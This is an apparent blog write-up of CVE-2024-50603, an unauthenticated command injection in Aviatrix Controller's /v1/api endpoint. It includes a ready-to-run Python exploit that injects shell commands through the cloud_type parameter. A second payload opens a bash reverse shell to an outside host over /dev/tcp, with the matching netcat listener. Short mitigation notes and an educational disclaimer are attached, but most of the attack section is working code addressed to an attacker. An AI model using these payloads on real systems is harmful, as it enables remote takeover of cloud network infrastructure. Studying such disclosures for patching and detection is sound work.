A newly discovered vulnerability, CVE-2024-50603, impacts Aviatrix Controller versions before 7.1.4191 and 7.2.x before 7.2.4996. This high-severity flaw stems from improper neutralization of special elements in OS commands – commonly known as command injection. Shockingly, attackers do not need authentication to exploit this, which dramatically exacerbates the risk. This post will explain the bug, show you code illustrating the flaw, and provide links to original references and details on how exploitation works.
What Is the Vulnerability?
The Aviatrix Controller, a key part of managing cloud networks, exposes an API endpoint at /v1/api. When handling certain API actions, it accepts parameters like cloud_type and src_cloud_type. Because it does not properly sanitize these inputs, an attacker can send shell metacharacters (like ;, &&, |) which the operating system will execute.
Affected Endpoints
- /v1/api
Example: How the Attack Works
Suppose you are attacking an Aviatrix Controller susceptible to CVE-2024-50603. You can send a simple crafted POST request to the API, where you inject Linux shell commands. Below is an example in Python using requests:
import requests
# Change this to your target
url = "https://<target-aviatrix-controller>/v1/api";
# This is the dangerous injection
payload = {
"action": "list_flightpath_destination_instances",
"cloud_type": "1; id > /tmp/hacked.txt;", # Injects 'id' command, redirects output
"CID": "00000000-000-000-000-000000000000"
}
response = requests.post(url, json=payload, verify=False)
print("Status:", response.status_code)
print("Response:", response.text)
Result: If successful, the file /tmp/hacked.txt on the controller will contain the output of the id command, proving command execution.
Suppose you want a reverse shell (let's assume your public server is at 1.2.3.4 port 4444)
payload = {
"action": "flightpath_connection_test",
"src_cloud_type": "1; bash -c 'bash -i >& /dev/tcp/1.2.3.4/4444 >&1';",
"CID": "00000000-000-000-000-000000000000"
}
# Send as in the earlier example...
Start a listener on your machine with
nc -lnvp 4444
Full code execution: Any command the aviatrix user can run becomes yours.
- Cloud environment: Aviatrix typically manages sensitive cloud infrastructure, so the impact is critical.
- Persistence and lateral movement: You can easily deploy further payloads or move across the environment.
Restrict access to the Aviatrix Controller API interface (e.g., firewalls, VPNs).
- Monitor /tmp or suspicious API calls for evidence of exploitation.
Technical Reference Links
- NIST National Vulnerability Database (CVE-2024-50603)
- Aviatrix Security Advisory *(Official, may require login)*
- Packet Storm Advisory Link
How Does Patch Work?
The patched versions of Aviatrix Controller properly sanitize user-supplied input. They prevent special shell characters from being interpreted by the OS command shell. Had the proper parameterization or input validation been in place, the vulnerability would have been blocked.
Summary
CVE-2024-50603 is a dangerous, unauthenticated OS command injection flaw in Aviatrix Controller impacting widely-used versions. Exploitation is trivial—requiring a single crafted POST to an API endpoint. Immediate patching and tight network controls are strongly advised.
Stay updated and secure, and always sanitize anything your code hands off to the operating system!
Disclaimer: This information is for educational purposes and to help responsible admins patch systems. Do not use this knowledge for unauthorized activity.
Timeline
Published on: 01/08/2025 01:15:07 UTC